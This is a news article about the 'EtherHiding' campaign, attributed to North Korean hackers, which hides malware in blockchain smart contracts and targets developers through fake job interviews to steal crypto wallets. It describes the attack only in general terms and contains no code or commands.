A New Twist: Malware Stashed Inside the Blockchain
For years, hackers have found creative ways to spread malware, but North Korean cybercriminals have now upped the ante. According to the Google Threat Intelligence Group (GTIG), since February 2025, these attackers have started embedding malicious software directly into public blockchains—the decentralized backbone behind cryptocurrencies.
Researchers have named the attack EtherHiding, since the hackers mainly exploit the Ethereum blockchain (although they also use Binance Smart Chain). Instead of relying on traditional servers—which are relatively easy for authorities to block—the hackers slip harmful code into so-called “smart contracts” on these blockchain networks.
Smart contracts are essentially automated programs that can execute various actions directly on a blockchain. They’re central to the functioning of decentralized finance (DeFi) platforms, managing everything from transfers between blockchains to handling users’ deposited cryptocurrencies.
Because the blockchain is public and accessible to everyone, all it takes for a hacker is to create a smart contract, insert the malware code as if it were a simple piece of data, and deploy the contract. The real kicker? The malicious code inside these smart contracts can be updated at any time—one identified contract was changed more than 20 times in just the first four months, according to Google.
Why the Blockchain Makes Hackers Untouchable
Once that malicious code is uploaded to the blockchain, there’s no way to delete it. Blockchains are designed to resist censorship, and that resilience is now being weaponized. Cybercriminals are essentially using the blockchain as their own digital fortress.
This unconventional tactic is currently being used as part of an ongoing crypto theft campaign.
“This development marks an escalation in the threat landscape: state-backed actors are now leveraging unprecedented techniques to distribute malware that’s hard for law enforcement to neutralize and easy to adapt to new campaigns,” explains Robert Wallace, one of Google’s lead researchers on the case.
The Trap: Fake Job Offers and Skill Tests
The operation kicks off with phony job offers for software developers. Posing as newly launched crypto startups, the hackers build credible-looking profiles on professional networking sites and job boards—even inventing entire companies to lure their targets. Once a developer takes the bait, they’re invited to a remote interview.
During the interview, the hopeful candidate is asked to complete a coding test, which involves running a provided script or program on their computer. At this point, the trap snaps shut. The initial script triggers the download of another script that’s cleverly hidden inside a smart contract on a blockchain.
The malware known as JADESNOW then springs into action, fetched straight from the blockchain. Its only job? To grab and launch the main malicious payload: a spyware named InvisibleFerret.
InvisibleFerret: The Digital Pickpocket
Once activated, InvisibleFerret quietly begins monitoring everything on the victim’s computer. It rifles through all installed browsers searching for saved passwords, stored login data, email addresses, and even any bank card information that’s been saved. But its prime target is cryptocurrency wallets, especially those managed via browser extensions like MetaMask or Phantom.
- InvisibleFerret sifts through the computer’s files, seeking out the private keys needed to access crypto wallets.
- When it finds valuable data, the virus compiles it into a ZIP archive.
- The pilfered archive is then whisked away—usually via Telegram (either a bot or private channel), or occasionally via a remote server—straight to the hackers, who can then empty the developer’s crypto wallets.
That’s the entire point of the operation: to steal digital assets and leave little trace behind.
Behind the Screens: North Korea’s High-Profile Hacking Gang
Orchestrating this large-scale scheme is a North Korean state-backed hacker group known under the code name UNC5342. This seasoned crew specializes in cryptocurrency theft, and if you needed a reminder, Kim Jong Un’s hackers consistently rank among the most dangerous threats in the crypto ecosystem.
So far this year, North Korean cybercriminals have already stolen the equivalent of $2 billion in digital assets. And if that sounds familiar, the infamous Lazarus Group—one of their peers—was behind the largest crypto hack in history when they took down the Bybit exchange back in February.
Let’s just say the cyber underworld of Pyongyang isn’t running out of dangerous ideas any time soon.
